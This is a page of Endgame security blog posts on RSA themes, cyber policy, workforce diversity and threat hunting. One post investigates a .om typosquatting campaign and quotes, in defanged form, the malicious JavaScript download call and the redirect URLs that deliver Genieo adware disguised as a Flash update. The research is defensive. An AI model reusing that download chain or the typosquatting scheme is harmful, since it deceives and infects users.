Quantcast
Channel: Endgame's Blog
Viewing all 698 articles
Browse latest View live

RSA’s 2016 Message: Don’t Stop Believin’

$
0
0

This year’s RSA Conference seems to have found its way into mainstream press and non-technical publications, benefitting from the additional PR due to the ongoing Apple-FBI dispute.  After hearing several keynote sessions and attending a range of diverse panels covering policy, data science, the dark web, and endpoints, there was nevertheless a few common themes that emerged across these broad topics. In many regards, the themes are not so much an emphasis on the latest technologies, but rather are pleas to alter the status quo, and pursue progress in three extremely complex but essential areas given the incredibly hard mission at hand for those in the security industry. The themes – or rather pleas – cross the realm of technical, policy, and organizational aspects of the security industry.

Prevention is Still Imperative:‘Assume breach’ has become an omnipresent, fall back position for many in security. Given the high-profile breaches and increasing sophistication of adversary techniques and campaigns, the probabilistic odds are in favor of the adversary who only has to be right once, while defenses must stop everything. Like most things, the pendulum swings back and forth, and this is the year of detection and response. Obviously, those are important, but it is equally important that we don’t acquiesce to the adversaries and give up on prevention and making it harder for the bad guys. At a minimum, a renewed emphasis on prevention as part of a larger strategy can help funnel down the breadth of attacks, limiting what gets through, informing and making it easier for the detection and response capabilities. Although it is an extremely difficult problem set, mitigating exploits and pursuing prevention remains essential to limiting the capabilities of attackers.

Privacy & National Security Can Co-Exist: Just as ‘assume breach’ has become commonplace, so has the notion that there must be a privacy/national security trade-off. This too should not remain acceptable, and the need to protect both was reiterated by government representatives in keynote talks and as panel participants. In fact, the Federal Government is on a major public relations campaign at RSA. Despite dialogue of a growing divide between Silicon Valley and Washington, DC – epitomized in the ongoing dispute between Apple and the FBI – audiences this year seem more welcoming than in previous years to the outreach. Moreover, the outreach is palpable and from multiple organizations, including Attorney General Loretta Lynch, Cyber Command Commander and NSA Director Admiral Michael Rogers, and Secretary of Defense Ashton Carter. As Carter noted, the only way to get to a good solution is by working together. But it isn’t just talk, as Carter was able to point to many concrete examples of areas for collaboration, including today’s announcement of the formation of the Defense Innovation Advisory Board, with Eric Schmidt as the chair. Lynch similarly noted examples of successful collaboration, including collaboration with the private sector against the “Gameover Zeus” Botnet. In addition to the emphasis on collaboration, the commoditization of data similarly permeated the talks. Data security is a national security imperative – not a trade-off – and requires collaboration and innovation between the communities.

Greater Workforce Inclusion is Possible: Finally, the cybersecurity talent shortage is discussed not only as a given, but is generally assumed to only get worse in the years ahead. However, what remains lost in this dialogue is the industry’s growing gender gap problem. In fact, calling it a gap is a vast understatement with women comprising just 10% of the workforce. Hopefully, necessity will drive change within the industry, which has little chance of addressing the talent shortage when leaving out half the population. Part of this challenge is the industry’s image problem, perpetuated by Hollywood, but it is much larger than that. For instance, there is yet again a striking lack of women on most of the panels at RSA or interviewed by the press. Only when technical women gain great visibility will other women realize the vast opportunities available to them in this industry. While there certainly are longer-term solutions to address the pipeline challenge, near-term solutions exist and must be pursued to attract women to the industry.


Each of these three areas falls in the realm of ‘wicked problems’, and reflects a status quo ripe for change and innovation. Technically, given the threat landscape, the odds are against comprehensive prevention, but it doesn’t mean we should throw in the towel. Organizationally, it’s time to break down the artificial divisions between Silicon Valley and DC and refuse to settle for a trade-off between privacy and national security. Finally, the numbers are increasingly bleak for gender diversity in the industry, but it is of paramount importance that this changes. We cannot simply accept the status quo in each of these areas, but rather a concerted effort must be made to innovate technically, organizationally, and culturally to help progress the industry and our security.


Endgame Tech Talks @ RSA: Adding Substance to Form

$
0
0

Last week, Endgame’s malware researchers and data scientists provided a welcome break from the the chaos of the convention floor at RSA. Our four talks addressed the need for a multi-stage approach to detection given the sophistication and diversity of attackers, and the complexity of enterprise networks. Since no single detection methodology is fail-proof, multiple comprehensive detection capabilities are required to expedite and optimize the likelihood of detecting known and unknown attacks.  

 

With that in mind, our talks began with an overview of Faraday, Endgame’s globally distributed set of customized sensors that listens to activity on the Internet. This talk addressed the ability to differentiate targeted from non-targeted attacks, and some recent research on the Cisco ASA vulnerability. This was followed by the five most impactful malicious behaviors, what they are, how they have evolved over time and in sophistication, and how to counter them. Next, our data science talk covered the use of machine learning to automate malware classification, and contextualize it by determining capabilities. We concluded with the essential role of stealth to help defenders evade detection by adversaries. Together, our talks provided four unique aspects of our multi-stage approach to detection, which feed into the Endgame cyber operations platform and inform our hunting capabilities.

 

Take a look for yourself at each of these unique presentations and diverse approaches to detection.

Extracting the Malware Signal from the Internet Noise: Andrew Morris

Dynamic Detection of Malicious Behavior: Amanda Rousseau

Machine Learning for Malware Classification and Clustering: Phil Roth

Worst-Case Scenario: Being Detected without Knowing You’re Detected: Braden Preston

 

What does Oman, the House of Cards, and Typosquatting Have in Common? The .om Domain and the Dangers of Typosquatting

$
0
0

House of Cards Season 4 debuted on Netflix this past weekend, much to the joy of millions of fans, including many Endgamers.  One particular Endgamer made an innocent, but potentially damaging mistake.  He mistyped the domain “www.netflix.com” as “netflix.om” in his browser, accidentally dropping the “c” in “.com”.  He did not get a DNS resolution error, which would have indicated the domain he typed doesn’t exist.  Instead, due to the registration of “netflix.om” by a malicious actor, the domain resolved successfully.  His browser was immediately redirected several times, and eventually landed on a “Flash Updater” page with all the usual annoying (and to an untrained user, terrifying) scareware pop-ups. Luckily, the Endgamer recognized danger and retreated swiftly, avoiding harm.

[[{"fid":"646","view_mode":"default","type":"media","attributes":{"height":"271","width":"372","class":"media-element file-default"}}]]

This led to many questions about this particular flavor of typosquatting effort.  Was this an isolated case or was it only a sample of a more prevalent and dangerous campaign?  Not only is it a potentially common error on an extremely popular site, but our hypothesis was that it is unlikely limited to only Netflix. Our Malware Research and Threat Intelligence team dug deeper.  We wanted to find out how many other huge Internet properties are actively being targeted with .om typosquatting as well as how many .om sites corresponding to popular properties are unregistered and thus vulnerable.  Finally, we wanted to know how easy is it to get a .om domain.  We were aware of abuse of other country code Top Level Domains (ccTLDs) including .co and .cm, but weren’t aware of .om abuse.

Our research revealed that there is at least one major .om typosquatting campaign targeting many of the world’s largest organizations.  It has already targeted over 300 well-known organizations, including Netflix, and given the spike in activity in February, is likely to only attempt to expand its reach in March. While the typosquatting campaign currently is a relatively unsophisticated effort, this kind of opportunistic behavior is typical of typosquatting and watering hole campaigns.  Our research also indicates that .om domains associated with the vast majority of major brands may be unregistered.  It does not appear that companies are widely including the .om in their typosquatting mitigation strategies.  We strongly recommend doing so.

 

What is typosquatting and why is it dangerous?

Typosquatting is a well-known security problem.  In a typosquatting campaign, a malicious actor will target one or more well-known websites or brands and register domains very similar to the legitimate domain.  Techniques often include doubling characters (“googgle.com”), adjacent keys (“googlw.com”), and letter swapping (“googel.com”).  Typosquatting easily solves one of the biggest hurdles for these bad actors: delivery of the malicious content.  In typosquatting, users just show up.

If the bad actor does his job well, a significant number of users mistype the intended domain in the expected way, and those unfortunate enough to hit “Enter” will unintentionally head down a dark road on the web.  In some cases, effects can be relatively mild, such as: the user is redirected to objectionable material; the user is presented items for purchase from storefronts of questionable repute; or the user sees content that unfavorably portrays the intended brand or site. Effects can also be much worse.  The malicious actor can spoof a real site to harvest login credentials, place backdoors on a system, install ransomware, or really anything else of his choosing.

 

Typosquatting and TLDs

Our discovery of the malicious netflix.om led us to focus our research on typosquatting via registrations of domains using alternate TLDs.  As of March 9, there are 1247 TLDs on the Internet according to the Internet Corporation for Assigned Names and Numbers (ICANN), the non-profit organization responsible for handling the overall Internet namespace.  This includes commonly seen TLDs like .com, .org, and .gov that are familiar to most Internet users. There are 251 ccTLDs representing nearly every country on Earth (many countries may have more than one ccTLD).  Beyond this, since 2013, ICANN began approving hundreds of new TLDs such as .guru, .tech, .florist, and many more.  This is a huge set of alternate TLDs which could be abused.

The most interesting set of TLDs for typosquatters are those that are likely to be mistyped.  We have seen some research on typosquatting of .co and .cm, the ccTLDs for Colombia and Cameroon, respectively.  Similarly, as we discovered with the Netflix example, the ccTLD assigned to the country of Oman, .om, is a prime candidate.  Simply drop the “c” in “.com” and you’re there.  An alternative method we also considered is flipping the “c” and the “.”. For example, “google.com” becomes “googlec.om”.  

 

How many .om’s are registered and possibly malicious?

We began our research of .om abuse by attempting to determine how many .om domains are associated with popular sites, who is registering these domains, and what is hosted at those sites.  To do this, we went through the 5,000 most popular domains globally and attempted to resolve whether the brand had an associated <brand>.om or <brand>c.om.  We discovered 334 domains that meet this criteria and are currently pointing to active sites.  There may be others that are registered, but are currently down or are in the process of being purchased. We contacted the most heavily clustered ISPs and shared information pertaining to the malicious domains before publishing.

Our next step was looking at registration information via WHOIS services.  We wanted to know if there were blocks of domains with the same registration information and timing of registration, and whether any appeared to have contact information associated with the legitimate property. During our research, we discovered that only fifteen of the .om domains were managed by the rightful owner or a brand protection organization. The entire list of these 15 domains can be found at the end of this post. ccTLDs can be challenging to analyze because WHOIS service can be quite restrictive in access to the registrant data. Malicious actors are aware of these limitations and therefore often use such ccTLDs to hinder attribution.  The .om ccTLD allowed for some data access. Interestingly, we were able to identify several actors who registered the majority of these domains in clusters as listed in the table below (295 out of the total 334). The entire list of suspicious domains can be found here.

[[{"fid":"647","view_mode":"default","type":"media","attributes":{"height":"393","width":"585","class":"media-element file-default"}}]]

It is worth noting that we have no reason to believe that these identities are associated with the malicious campaign.  Registrant names can be easily spoofed, can be an alias, or could be filled in as an artifact of the registration process; for example, an identity associated with domain approval.  Attempting any attribution of this typosquatting campaign is beyond the scope of this research.

We then sought to understand whether there were any interesting patterns in registrations.  Given the clustering in registrants, we expected to see those identities clustering in terms of time of registration.  This could imply a fully scoped malicious campaign wherein the malicious infrastructure was staged at a give time.  As the following graph demonstrates, we saw spikes.  The Feb 2016 spike, for example, is due in part to a large number of Ahmed Al Amri registrations on February 25th.  It is possible that this could be a result of a batch of domains being approved at that time (see the section on registering a domain for information on a waiting period).

[[{"fid":"648","view_mode":"default","type":"media","attributes":{"height":"348","width":"695","class":"media-element file-default"}}]]

We next determined where .om domains are being hosted.  As with registration information, we noted clustering here as well.  The 334 .om sites related to well-known Internet properties are hosted on 15 different hosting providers.  As a sampling, 111 of the domains (including netflix.om) are pointing at IPs associated with Tiggee LLC, a US-based hosting provider. Casablanca, a Czech hosting provider, and Choopa LLC, a hosting provider in New Jersey, account for other large chunks. Unsurprisingly, many point to the same IP address within a given provider.  For example, the 111 domains on Tiggee point to only four IP addresses hosted at that provider and from there, a series of redirections take place.  On top of the previous evidence, this tight clustering in where the domains are hosted gives us very clear evidence of typosquatted .om domains being grouped.  

We wanted to see what software stack is running on the servers hosting .om sites.   We used Shodan to do this.  Due to our focus on netflix.om, we looked most closely at the servers on Tiggee.  Very unsurprisingly, the software stack on these servers was uniform.  Many of the machines serving up these domains have severe unpatched vulnerabilities, including some which could provide arbitrary remote access. That is, these hosts could easily be exploited by other actors to serve up alternate (possibly worse) malicious content than what’s currently being served.

Having convinced ourselves that there is at least one typosquatting campaign underway, we wanted to identify how much traffic the malicious sites receive.  In other words, how common is the targeted typo?  To answer this question, we looked at our sources of passive DNS data.  Passive DNS provides an analyst with information about DNS activity.  We see that the actors behind this typosquatting attack have been quite successful. There are at least thousands of queries per day to the malicious .om domains from different recursive DNS resolvers across the world.  This is the lower bound on the amount of activity, given caching and the limited scope of passive DNS sensors we have access to.  The footprint is global, as displayed in the diagram below.  

[[{"fid":"649","view_mode":"default","type":"media","attributes":{"height":"284","width":"577","class":"media-element file-default"}}]]

It is worth restating a point from above.  The vast majority of .om domains associated with brands in the top 5,000 do not currently resolve to active sites.  We don’t have access to the .om zone file to know for sure whether this means they aren’t registered, but we’d assume that a significant chunk probably are not registered.  Most active .om sites associated with popular brands appear to be part of malicious campaigns.  It’s concerning to us that typosquatters could scoop up many more popular domain names in the .om ccTLD, exponentially increasing the impact.

In our experience, typosquatting for the purpose of content delivery is mostly the realm of cyber criminals and questionable ad networks.  APTs have been seen copying domains for visual similarity to hide C2 and exfil, for example, the we11point.com domain being used as infrastructure in the Anthem attack.  We could see typosquatting being increasingly used in a similar fashion as targeting watering holes by determined adversaries to gain access.  The 2013 attack on a popular iOS developer site that led to the compromise of Facebook, Apple, and many others is a good example of the potential implications of watering holes. It could be possible for a ‘.om’ domain being bought and used to catch a small number of mistakes over time from targeted organizations, enabling an actor to drop backdoors into a targeted network.  

 

What happens when a user visits one of these sites?

Having understood the scope of this problem, we wanted to understand what takes place when a user visits one of these malicious .om sites.  We also wanted to look at the content being served across the the different domains in an attempt to solidify our understanding of how activity is grouped within campaigns.

As was the case with the original netflix.om domain we initially encountered, a majority of the other typosquatted domains appeared to exhibit the telltale signs and behavior of adware redirection sites. Accessing one of these sites tends to lead the user’s browser to a few different web pages in a very short period of time, with the ultimate destination having content that may not even be relevant to the URI accessed in the first place. The redirections are in place for a few different reasons:

  1. The original URI can be made to appear somewhat legitimate, obscuring the path users will be forced to go down upon access.
  2. The malicious actors can redirect the users to targeted platform-specific and / or location-specific content that may entice a naïve user to continue their journey further down the rabbit hole.
  3. The actors can change the destination web pages in an instant by modifying one or more of the redirect pages, thus allowing for easy pivoting to new pages or servers much like an incredibly frustrating game of Whack-A-Mole.
  4. Tracking cookies can be generated along the way to the ultimate destination and placed within the user’s browser cache to surreptitiously monitor their behavior and provide further means for the actors to monetize a user’s unfortunate trip to their site.

Regardless of the relevance of the content, the destination web page will almost assuredly be riddled with advertisements, surveys to complete for free electronics, or scareware tactics to entice users to download and execute an anti-virus suite that leads to further headaches and intrusive advertising. The goal of these pages is simply to generate as much advertising revenue as possible for the bad actors while trying to keep naïve users engaged and / or scared in order to keep them clicking more links and prolonging their sessions.

We quickly discovered that there was a limited set of redirection techniques and adware content that were consistently served up by the malicious .om domains. Due to the similarities involved (if not exact matches) in the HTML and JavaScript that was collected, we were able to divide the domains into distinct categories according to the different hosting providers.  The content served at domains hosted at the same provider usually stayed within a small set (one or two) of redirection techniques or adware content. The maximum number of redirection techniques we saw on any host was five.  

After completing the scraping and tallying up the various techniques and adware content, there was one grouping of data in particular that stuck out. The .om domains hosted at Tiggee and Casablanca served up the same or similar content in several instances, which provides evidence that one actor is likely operating on those two providers.  

The following demonstrates some of the redirects on a couple of the .om sites.  

[[{"fid":"650","view_mode":"default","type":"media","attributes":{"height":"446","width":"684","class":"media-element file-default"}}]]

 

Targeting of Mac users with malware

The redirect / adware pages hosted at the typosquatted domains were very annoying and possibly alarming to users, but we did not note any malware being dropped or any prompts to install malware, in contrast to the Endgamer’s experience over the weekend.  We theorized that sites may be performing operating system and/or user agent detection.  Based off of the user’s configuration,  the sites would serve advertisements or adware catered to his or her platform.  This is a common tactic for malicious actors.

We switched from using a Windows virtual machine with varying browser configurations and instead moved to using a OS X virtual machine with Firefox.  Upon doing this, we were able to reach the same page seen by the Endgamer earlier in the week, capture malware, and perform our analysis.

[[{"fid":"651","view_mode":"default","type":"media","attributes":{"height":"307","width":"468","class":"media-element file-default"}}]]

When clicked, the “Download” and “Install” buttons call a JavaScript function to initiate the download and produce a popup within the browser: 

 

javascript:downloadEXEWithName('
 hxxp://ttb.newmysoftb[.]com/
 download/request/561257515f1c1ec447000000/
 LVw2a59i',%20'LVw2a59i',%20'FlashPlayer.exe')

[[{"fid":"652","view_mode":"default","type":"media","attributes":{"height":"162","width":"537","class":"media-element file-default"}}]]

Despite the name, the downloadEXEWithName function does not result in a Windows executable being downloaded. The function builds a unique URI for downloading the adware:

hxxp://ttb.newmysoftb[.]com/download/
request/561257515f1c1ec447000000/
LVw2a59i?__tc=1457627771.679&lpsl=a8604c33f478be1581e95cfe73ed6147&expire=1457713110&slp=www.getfiledow.com&source=netflix.om&c=0.0069&fileName=FlashPlayer

 

When this second URI is accessed, it will initiate another redirect to a OS X DMG file hosted at an Amazon AWS S3 bucket:

hxxps://s3.amazonaws[.]com/hm-ftp/prod/
1000012/80801124/162/installer/
default/AdobeFlashPlayer.dmg
?postbackURL=http://platform1.admobe.com/p/ic.php&postbackData=s|YXAZoZX...

The download was then determined to be Adware Genieo, a common OS X malware / adware variant. Genieo typically infiltrates the user’s system by posing as an Adobe Flash update and drops a OS X DMG container, as was the case in our experience. Genieo then entrenches itself on the host by installing itself as an extension on various supported browsers (Chrome, Firefox, Safari).

The variant in this case appears to function similarly to standard Genieo variants in that it installs browser hijacking extensions in Chrome, Firefox, and Safari:

[[{"fid":"653","view_mode":"default","type":"media","attributes":{"height":"489","width":"528","class":"media-element file-default"}}]]

The Firefox extension will attempt to alter the browser homepage to hxxp://www.hmining[.]mobi/homepage, while the Safari extension contains hardcoded references to the S3 bucket from which the original DMG was downloaded: hxxp://s3.amazonaws[.]com/hm-ftp/prod/%@/offers/%04d/%@. As is typical with Genieo variants and other browser hijacking adware, the extensions contain extensive capabilities for modifying the configuration of each of the respective browsers in order to provide targeted advertising and generate ad revenue for the adware developers and distributors, much to chagrin of their unfortunate victims.

Because it’s a fairly well researched piece of malware, we will not go further in-depth here.  For more information on Genieo, please see: http://www.thesafemac.com/genieo-adware-downloaded-through-fake-flash-updates .

 

Buying a .om domain

As detailed above, the majority of .om domains for top Internet sites are probably unregistered, and only a small number appear to be controlled by the legitimate brand.  In investigating the .om ccTLD, we found conflicting information about authorized usage of the .om ccTLD.  Some sources indicate that this ccTLD is used by “Omani Government and official parties,” while other sources indicate that .om is open for all to register and has no auxiliary requirements.  Obviously some very questionable .om domains are in the wild.  We decided to register a domain and see what would happen.

We identified several websites that claimed to sell .om domains.  We chose one, which offered a domain for $269 per year.  We registered with obviously bogus information (similar to “John Smith”, “123 1st St”, “(111)-111-1111”) and made the purchase.  The only identity verification requirement was clicking a verification link sent to a legitimate email address, which had no relation to the domain being acquired.  We were informed that we now owned the domain, but were subject to a two month waiting period.  It was not specified what would occur during this two month period.  But wait!  The website went on to offer what seemed to be an expedited process for an additional $335.  The same company even offered to assist with establishing a “new official business” in Oman.
[[{"fid":"654","view_mode":"default","type":"media","attributes":{"height":"209","width":"731","class":"media-element file-default"}}]]

We chose to initially register without any add-ons and reach out later to request the expedited process.  Within an hour of requesting expedited service, a representative from the registrar contacted us.  At this point, the representative asked us for proof that we were associated with the brand in question.  He was extremely helpful and willing to support us, but with our information being so obviously bogus, we hit a snag.  It did appear that there was some concern towards proving that we’re real, at least in this case.  As a test, we registered a second .om domain with legitimate looking contact details and asked to expedite it at the time of initial purchase.  As of this writing, we have not received any inquiries but the second expedited purchase remains in process.  We don’t know why we haven’t received the same questions about documentation but assume that it’s because on the surface the information looks much more legitimate.

This leaves some open questions.  We did experience a verification step in the expedited process.  We do not know whether the same verification would have been requested during the two month waiting period had we not expedited.  As we detailed, hundreds of malicious domains clearly not associated with the targeted brand have recently been registered.  It is highly unlikely that purchasers had proof of ownership.  Bottom line, we do not know how all of these domains were approved for registration, but .om is clearly not just for official Omani government use. In fact, as we demonstrated, for a reasonable price you too can own a .om domain.

 

Conclusion

Based on our research, this has much broader implications and relevance for a variety of organizations, not just Netflix.  It may not be well known that .om domains are available for purchase.  The vast majority of .om registered domains are malicious, according to our research, and they are receiving a non-trivial amount of traffic.  Equally concerning, many popular sites remain unregistered and therefore vulnerable.

Most large companies already have a typosquatting mitigation strategy.  Companies identify domains, register, and control likely domains their customers may accidentally enter.  It’s relatively easy to identify and purchase candidate domains using tools such as  Domain Tools’ Domain Typo Finder.  We recommend that companies prioritize adding .om registration to protect their reputation, and block known-malicious .om domains to protect their enterprise.  

The effects in this case were relatively mild, with the installation of common adware the worst case scenario for an unfortunate user.  But, that does not mean this attack vector should be taken lightly.  The malicious actors could have just as easily taken more malicious actions such as installing ransomware, unwittingly including victims in a botnet, or hosting additional malware on victims.  Furthermore, typosquatting techniques could be used by more persistent and patient adversaries to gain remote access to targeted victims.  

Companies - especially high profile companies - should expand their typosquatting mitigation strategies to additionally focus on TLDs if they aren’t already. As we have seen, the .om typosquatting impacts many high profile companies whose customers are now vulnerable to the same deception that our colleague discovered when attempting to binge watch this season’s House of Cards.

 

Update 3/16/16: Since the initial publication, a large percentage of the .om websites have been updated to serve only ad content instead of serving adware/malware links to Mac users. The campaign remains concerning, as the identified sites remain active and and could be switched back to serving more malicious content at any time.  The reasons for this change are unknown.

 

Update 3/25/16: Of the 319 malicious .om domains we originally reported on 11 March, 292 have been deleted or had their DNS records removed. Updates to the "whois" server indicate that the domain status was revoked by the registrar due to "Violating the terms of registration as per the registry-registrar agreement". The original, complete list of domains that appeared suspect can be found hereThe updated list of domains that still remain active since publishing our research can be found here.

 

List of 15 .om domains that appear legitimate

nextdirect.om

hotwire.om

vmall.om

tripadvisor.om

hyatt.om

entrepreneur.om

bbc.om

icloud.om

marriott.om

twitter.om

lego.om

panasonic.om

tv.om

papajohns.om

pizzahut.om

Counterterrorism-Cybersecurity Strategy Over Soundbites

$
0
0

Counterterrorism is not easy.

Last week’s terrorist attacks in Belgium served as yet another horrific reminder of the complexity and intractability of counterterrorism (CT). Unfortunately, just as occurred following last year’s Paris and San Bernardino attacks, there is a tendency in the media and among politicians to call for easy but archaic solutions, like physical and virtual walls, that are ill-equipped to handle the complex elements of CT.

Here is what we all—angry politicians and talking heads alike—do need to understand: As George Kennan noted while discussing the Vietnam War, strategy cannot be simplified to sound bites, and there are dangers inherent in foreign policy by bumper sticker. Given the complexities of terrorism and technological diffusion, this is just as true today as it was fifty years ago. Continuing to instigate a string of policy proposals that run counter to democratic ideals and the free flow of information, in order to provide an easy solution to a problem that doesn’t have one, will fail to achieve stronger security. As these CT challenges and responses are inextricably linked with cybersecurity, an integrated socio-technical CT-cybersecurity strategy, while a less digestible point for pundits, is much more likely to succeed.

The Counterterrorism Analytical Framework in the Counterterrorism Joint Publication 3-26 lists nine critical factors or centers of gravity of terrorist networks: leadership, safe haven, finance, communication, movement, intelligence, weapons, personnel, and ideology. Every factor relies heavily on the Internet, from research and distribution of weapons, money transfers, and spreading ideology. Social media has garnered the most attention, especially with regard to recruitment, while the Apple-FBI case has elevated the encryption debate and concerns over security-privacy trade-offs. Further, terrorist groups rely on digital technologies as instruments of power across the spectrum of all critical factors. Members of the Syrian Electronic Army are facing criminal charges in the US for online criminal activity and hacking, while groups like al-Shabaab in Somalia rely on mobile money transfers for financial transactions and funding. In short, technology supports all critical factors of terrorist networks.

Given the diverse and nuanced use of digital technologies by terrorist groups, it is disheartening that many reactive policy proposals fail to understand how intertwined technology and CT are on and offline, or that there are many parallels between CT proposals in the physical and virtual world. The most worrisome trend is the increased rhetoric demanding the closing of borders, or withdrawal from regional collaborative institutions such as the European Union or NATO. On the geopolitical realm, this push for domestic isolation will set back decades’ worth of gains that have been made in the economic and social realms, not to mention their pacifying impact on interstate relations. Simultaneously, the misperception that information isolation is possible has led to a patchwork of proposed or instituted policies that are segmenting the free flow of information. The French proposal to ban Tor and block public Wi-Fi, and discussions of blocking the Internet, are just two recent examples of how CT responses fail to take into account the negative externalities of such policies as well as the technical realities of the modern era. There have also been proposals to regulate Bitcoin and virtual currencies, despite the spread of technologies that obfuscate money trails, or Europol’s findings that ISIS does not use Bitcoin when planning attacks.

This regression inward is accompanied by calls to build both physical and virtual walls to combat terrorism. While this may have previously worked to varying degrees, it has at times had unanticipated consequences (e.g. the Maginot Line), and simply doesn’t work today. Just as a physical wall can be circumvented, closing parts of the Internet is outdated and ineffective. Moreover, as the most recent attacks in Europe and the U.S. indicate, building walls completely ignores homegrown terrorism. Similarly, any fragmentation or barrier to the Internet is ineffective against insider threats which have had the biggest impact on national security.

CT and cyber experts rarely are one in the same, but these two areas are increasingly interconnected, with CT driving many of the policy and public debates in the cyber realm. Government policy representatives recently met with Silicon Valley tech leaders to discuss CT, seeking assistance in limiting the role of social media as a recruitment and propaganda tool. While the outreach to the tech community is a good first step, this meeting would have benefitted from the participation of CT experts. Policies that focus solely on the technological aspect of CT will address the means used, not the root causes of terrorism, and will discount insights on the social, economic, and political causes of terrorism. The whack-a-mole approach to CT by experts in the tech sector has proven ineffective, but unfortunately that is the current state of CT policies in the digital domain, as every suspended Twitter or Facebook account is easily replaced with many more new ones. To date, most of the CT proposals that pertain to the Internet fail to understand the organizational structures of terrorist networks and the various critical factors that are necessary for group survival.

Similarly, most CT experts’ proposed policies fail to take into account modern technical realities. Many of their proposed solutions actually hurt those who use the Internet normally and daily, while having no impact on bad behavior. Encryption, Wassenaar, banning Tor, cutting off the Internet, and so forth—all of this hurts the average citizen and civil rights movements and has no impact on criminal or terrorist activity. Unfortunately, with the reoccurrence of high profile terrorist attacks, the immediate, reactionary responses are too often misaligned with root causes and technical realities.

Too often, politicians seek quick sound bites to demonstrate they are tough on terror, but these have little alignment with the threat and technology. It’s time to move beyond bumper sticker CT and cybersecurity policies, and pursue strategies that take into account both the social and technical complexities of the modern era.

*This post was originally featured on New America weekly

When Unicorns are the Majority: The power of positivity when it comes to diversity in cybersecurity

$
0
0

From academia to government to now industry, I’ve never worked in a field with more than 20 percent women, and that is being very generous. That is why it felt extremely strange to sit in a large room with over 700 women working in or studying cybersecurity a few days ago at the Women in Cybersecurity Conference. With so many competent and impressive technical women across the room, the myth of the unicorn was quickly dispelled. You just need to know where to look.

Sure, we had the obligatory discussion of the low and possibly further regressing level of female participation in cybersecurity (seriously, it went from 10 percent last year to 8 percent this year, according to several speakers). But the best part of the conference was that the theme mirrored what I felt initially: that though the numbers of women are small, we are doing some remarkable things, and this is an exciting time to be in the field. This positivity is what we need more of in media, pop culture, and academic portrayals of cybersecurity. It could go a long way toward dispelling the erroneous negative perception of the field (that it’s innately militaristic, and best suited to loner male socially disconnected types) that continues to serve as a barrier to entry — as well as retention.

With that in mind, I’ve pulled together key themes from this year’s Women in Cybersecurity Annual Conference. I hope they’ll serve as reminders as to why we stay in the field, and that they could encourage others to pursue cybersecurity careers.

 

The Diversity Within: It’s not just about gender or race. — The conference was a great reminder that when we talk about diversifying the cybersecurity industry, we’re talking about much more than demographic differences. Within the predominantly female group at the conference, there was a phenomenal depth of professional backgrounds (industry, academia and government), generations (students of all levels, mid-career, and seasoned professionals) and disciplines (anything from computer science to theoretical mathematics to anthropology). Keynote presenters included a cryptographer, business professionals, and an incident responder. None of them were dark, shady characters in hoodies, but super-smart and enthusiastic women changing the industry.

 

Communication is key — and it’s not just about code. — The ability to write and communicate clearly surpassed any programming languages as the top recommended traits for success in cybersecurity. From proposal writing to meeting with a board to working on a team, the ability to communicate technical aspects to non-technical audiences is essential now, and will only become more important as the field expands. Experts also pointed to a solid foundation in math as a bridge-builder skill — meaning that it could enable a variety of career paths within cybersecurity.

 

The mission is powerful, and unique. — Both national security and the social aspects of cybersecurity were frequently noted as key drivers and motivators that keep women in the field. This resonated for those working in industry, academia and government, and was complemented with the challenging nature of the work. Want to find a good challenge and have a big impact, cybersecurity is the way to go.

 

No ‘manels’ in sight. — It is possible to have panels full of women talk about and inspire through their technical acumen and not their gender. Despite complaints by numerous conference organizers that they can’t find women to populate panels, these women exist — and this conference was proof of that. Here’s to hoping that panels full of men — a statistically unlikely occurrence absent conscious or unconscious bias — will someday be a distant and funny memory, like the #bindersfullofwomen meme.

 

That said…we still need men to hear and deliver these messages. — As almost every personal story noted, male allies are a crucial component to moving beyond single digit female representation in the industry. Fathers, colleagues, mentors, and friends all play an essential role and must be active participants in encouraging women to pursue or stay in the industry.

After explaining complex aspects of encryption, Yael Kalai of Microsoft conveyed another empowering message. We women are in a position ofpower. The industry needs us, and not the other way around. In other words, women are not token diversity hires, but are essential for organizations to achieve greater creativity and innovation, and an enhancedbottom line. That means if your company isn’t supporting you, move on. The demand is high, the supply is low — the math is on our side.

 

Andrea Limbago is the principal social scientist at Endgame.

This post was originally published by New America as part of Humans of Cybersecuritya dedicated section on Context that celebrates stories of the people and ideas that are are changing our digital lives. It is part of New America’s Women in Cybersecurity Project, which seeks to dramatically increase the representation of women in the cybersecurity/information security field by fostering strategic partnerships with industry leaders, producing cutting-edge workforce research, and championing women’s voices in media. This is a project of New America’s broader Cybersecurity Initiative, which aims to clarify and connect the often disjointed debates and policies that surround the security of our networks.

Top 3 Requirements for Threat Hunting

$
0
0

With the SANS Threat Hunting Summit just days away, and adversary hunting gaining visibility across the industry, hunt is one of those terms that is frequently mentioned but not well-understood. What does hunting mean? What does it take to be a hunter — defeating the most sophisticated adversaries — in a rapidly evolving threatscape?

We’ve outlined three requirements for adversary hunting below. But first, why should organizations hunt?

 

Why Hunt?

Today, organizations take greater than 146 days to discover breaches, with the majority of these detections discovered not by the company itself, but by external organizations. Adversaries are more sophisticated in their attacks, and the traditional security stack, dependent on short-lived indicators of compromise, is not enough to tackle these modern threats. The complexity of data has also led to alert fatigue and a data deluge (including too many false positives) that overwhelms security teams with limited time and resources. To address these challenges, targeted adversary hunting enables organizations to proactively detect and stop attackers without known indicators of compromise, before damage and loss of information occurs.

 

Top 3 Threat Hunting Requirements

 

1. Evade the Adversary

Today’s adversaries look for known defensive tools, tampering and disabling them to gain access to critical systems. They are able to persist and move throughout networks freely until they find what they are looking for. To defend against them, organizations similarly must create adversary blind spots and evade detection to gain full visibility of both their networks and the adversary. By replicating adversaries’ techniques, organizations gain much greater insight into adversarial tactics, informing both the detection and prevention.

 

2. Cover all Stages of the Kill Chain

Given the sophistication of adversaries, no single detection methodology is fail-proof for hunting. However, adversary hunting remains too manual, with clunky interfaces and more data than anyone could reasonably handle. Key capabilities are often distributed across multiple interfaces, preventing synchronization and data integration, and leaving gaps in kill chain coverage. Given the scale of the data and the sophistication of the threats, multiple methods are required within a single interface to empower the hunt mission across all stages of the kill chain. This includes automating large-scale malware classification, as well as preventing whole classes of exploits and techniques (such as lateral movement) instead of a reactive whack-a-mole approach, coupled with an intuitive interface to expedite and facilitate data exploration and prioritization.

 

3. Evict without Business Disruption

